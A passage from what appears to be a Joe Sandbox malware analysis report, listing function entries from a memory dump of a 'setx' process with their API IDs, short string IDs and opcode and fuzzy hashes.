                        • Instruction Fuzzy Hash: 5A411035A00202ABDB20EE25CC41B66B7A5FB84718F204618F955EB640EB21E95ACBD1
                        Function 02CC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: ___swprintf_l
                        • String ID: %%%u$]:%u
                        • API String ID: 48624451-3050659472
                        • Opcode ID: 9e7b61407ed48ef74ac262db5d42e575d040109f5c3554e7b9dee57f6d277e75
                        • Instruction ID: 939577e285b2f3a7bf36ba6084debb404a81915305250f130f6762da16577b1d
                        • Opcode Fuzzy Hash: 9e7b61407ed48ef74ac262db5d42e575d040109f5c3554e7b9dee57f6d277e75
                        • Instruction Fuzzy Hash: A4316672A002199FDB20DE29CC40BEE77BDFF44614F54459AEC49E3240EB30EA549FA1
                        Function 02C57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID: __aulldvrm
                        • String ID: +$-
                        • API String ID: 1302938615-2137968064
                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                        • Instruction ID: e7423cd65c76aa908ea9de99faff0112f6f1a09167f83e98c8c74edf4881e81a
                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                        • Instruction Fuzzy Hash: 5F91B070E002269FDF24DE69C880ABEF7A5AF84324F54471AEC55AB2C0D775CAC4CB58
                        Function 02C19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: true
                        • Associated: 00000012.00000002.3280086458.0000000002D09000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                        • Associated: 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_2be0000_setx.jbxd
                        Similarity
                        • API ID:
                        • String ID: $$@
                        • API String ID: 0-1194432280
                        • Opcode ID: c1a960e2ab461c2a319b0921b73b0fa8d2bf9f0fc2db6e593758c169e0e93cc1
                        • Instruction ID: 86de6736610b1b13e13ed43da5e89418b5ab65895b70d6a93d4a7021590e9358
                        • Opcode Fuzzy Hash: c1a960e2ab461c2a319b0921b73b0fa8d2bf9f0fc2db6e593758c169e0e93cc1
                        • Instruction Fuzzy Hash: B1815C72D002699BDB35CB54CC59BEEB7B8AF48714F1041EAE909B7250D7309E84DFA1